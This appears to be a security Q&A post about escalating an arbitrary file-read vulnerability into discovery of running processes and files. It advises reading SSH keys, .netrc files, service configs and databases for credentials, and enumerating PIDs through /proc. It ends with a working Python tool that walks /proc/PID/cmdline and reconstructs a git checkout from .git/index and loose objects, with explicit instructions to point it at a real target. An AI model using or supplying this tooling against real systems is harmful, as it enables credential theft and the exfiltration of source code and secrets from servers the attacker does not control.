How to list all files with only arbitrary file path read, but no directory listing nor sudo?
You can try other locate implementations that index world-accessible files in a world-readable index, typically located at /var/lib/locate/locatedb or /var/cache/locate/locatedb or some such.
I don't see a lot of need for file listing to escalate your access on a typical server. Usually you'd know what application you're attacking and retrieve its configuration files and its database and obtain credentials this way. You might try files such as .netrc, .ssh/id_rsa and .ssh/config to see if the account can be a gateway into other accounts. If you aren't sure what may be running on the box, try lots and lots of plausible file names.
The one thing that's a bit long to exhaust is the PID values, to explore what's running. It takes 32k requests to exhaust pid_t under Linux by default, and you can check the maximum value in /proc/sys/kernel/pid_max. The command line is in /proc/PID/cmdline; you don't get to see the list of open files (you need readlink for that) but you can see their content (cat /proc/PID/fd/0 …).
For the specific case of a build service, do check the configuration files of that service. That should help you locate the git repository. If you've been able to locate a git checkout, look in .git/index and .git/logs/HEADS and perhaps other files in .git/logs (experiment with that service to see which branches are used and what operations it uses). This should let you retrieve object IDs which you can then read from .git/objects.
Other than finding a locate database, I can't think of a way to elevate read-files access into list-files with a typical configuration.
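Added example, not part of the answer above: the PID walk over /proc/PID/cmdline bounded by /proc/sys/kernel/pid_max, and the .git/index to .git/objects step, driven by a file-read primitive. The primitive is modelled as a callable `read_file(path) -> bytes | None` (an assumption; however you obtained arbitrary read, wrap it in that shape). The index parser follows the documented git index layout for versions 2 and 3; the `build_index` helper, the `fake_fs` stand-in and every path, PID and file content in `demo()` are constructed fixtures so the block runs offline.

```python
"""Turn an arbitrary-file-read primitive into process and repo enumeration."""
import hashlib
import struct
import zlib
from typing import Callable, Dict, List, Optional, Tuple

# Assumed shape of the read primitive: path in, file bytes out, None on failure.
ReadFile = Callable[[str], Optional[bytes]]


def read_pid_max(read_file: ReadFile, default: int = 32768) -> int:
    """pid_max bounds how many /proc/<pid> reads are needed (32768 by default)."""
    data = read_file("/proc/sys/kernel/pid_max")
    try:
        return int(data.decode().strip()) if data else default
    except ValueError:
        return default


def enumerate_processes(read_file: ReadFile, pid_max: int) -> Dict[int, List[str]]:
    """Read /proc/<pid>/cmdline for 1..pid_max-1; argv is NUL-separated.
    An empty file (kernel thread, zombie) or a failed read is skipped."""
    found = {}
    for pid in range(1, pid_max):
        data = read_file(f"/proc/{pid}/cmdline")
        if data:
            found[pid] = [a.decode("utf-8", "replace") for a in data.split(b"\0") if a]
    return found


def parse_git_index(data: bytes) -> List[Tuple[str, str, int]]:
    """Parse .git/index v2/v3 into (path, blob sha1, mode).
    Entry = 62 bytes (stat data, sha1, flags), +2 for v3 extended flags,
    then the NUL-terminated path, padded with 1-8 NULs to a multiple of 8."""
    sig, version, count = struct.unpack(">4sII", data[:12])
    if sig != b"DIRC":
        raise ValueError("not a git index")
    if version not in (2, 3):
        raise ValueError(f"unsupported index version {version}")
    entries, off = [], 12
    for _ in range(count):
        mode = struct.unpack(">I", data[off + 24:off + 28])[0]
        sha1 = data[off + 40:off + 60].hex()
        flags = struct.unpack(">H", data[off + 60:off + 62])[0]
        fixed = 64 if (version == 3 and flags & 0x4000) else 62
        name_len = flags & 0x0FFF
        if name_len == 0x0FFF:  # name too long for the flags field: scan for NUL
            name_len = data.index(b"\0", off + fixed) - (off + fixed)
        name = data[off + fixed:off + fixed + name_len].decode("utf-8", "replace")
        entries.append((name, sha1, mode))
        off += ((fixed + name_len) // 8 + 1) * 8
    return entries


def loose_object_path(git_dir: str, sha1: str) -> str:
    """Loose objects live at .git/objects/<first two hex>/<remaining 38>."""
    return f"{git_dir}/objects/{sha1[:2]}/{sha1[2:]}"


def parse_loose_object(data: bytes) -> Tuple[str, bytes]:
    """A loose object is a zlib stream of b'<type> <size>\\0<content>'."""
    header, _, body = zlib.decompress(data).partition(b"\0")
    otype, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError("object size mismatch")
    return otype, body


def dump_checkout(read_file: ReadFile, git_dir: str) -> Dict[str, bytes]:
    """Recover tracked file contents: index -> blob ids -> loose objects.
    Objects that only exist in a packfile are not reachable this way."""
    index = read_file(f"{git_dir}/index")
    out = {}
    for path, sha1, _mode in parse_git_index(index) if index else []:
        obj = read_file(loose_object_path(git_dir, sha1))
        if obj is not None and parse_loose_object(obj)[0] == "blob":
            out[path] = parse_loose_object(obj)[1]
    return out


def build_index(entries: List[Tuple[str, str, int]]) -> bytes:
    """Constructed v2 index fixture for testing the parser (not a git API)."""
    body = b""
    for path, sha1, mode in entries:
        name = path.encode()
        rec = (struct.pack(">10I", 0, 0, 0, 0, 0, 0, mode, 0, 0, 0)
               + bytes.fromhex(sha1) + struct.pack(">H", len(name)) + name)
        rec += b"\0" * (((62 + len(name)) // 8 + 1) * 8 - len(rec))
        body += rec
    data = b"DIRC" + struct.pack(">II", 2, len(entries)) + body
    return data + hashlib.sha1(data).digest()  # trailing checksum as in real indexes


def fake_fs(files: Dict[str, bytes]) -> ReadFile:
    """Constructed stand-in for the real read primitive."""
    return lambda path: files.get(path)


def demo():
    """Constructed target: a CI box with one tracked config file."""
    blob = b"password=hunter2\n"
    raw = b"blob %d\0" % len(blob) + blob
    sha = hashlib.sha1(raw).hexdigest()
    git_dir = "/srv/ci/repo/.git"  # hypothetical path
    fs = fake_fs({
        "/proc/sys/kernel/pid_max": b"32768\n",
        "/proc/1/cmdline": b"/sbin/init\0",
        "/proc/812/cmdline": b"/usr/bin/java\0-jar\0ci.jar\0",
        f"{git_dir}/index": build_index([("config/db.ini", sha, 0o100644)]),
        loose_object_path(git_dir, sha): zlib.compress(raw),
    })
    return enumerate_processes(fs, read_pid_max(fs)), dump_checkout(fs, git_dir)
```

Against a real target, replace `fake_fs` with the primitive you actually have; the PID loop costs one read per PID, which is the 32k-request budget the answer mentions, and /proc/PID/cmdline is the cheapest place to learn which service's config files to go after next.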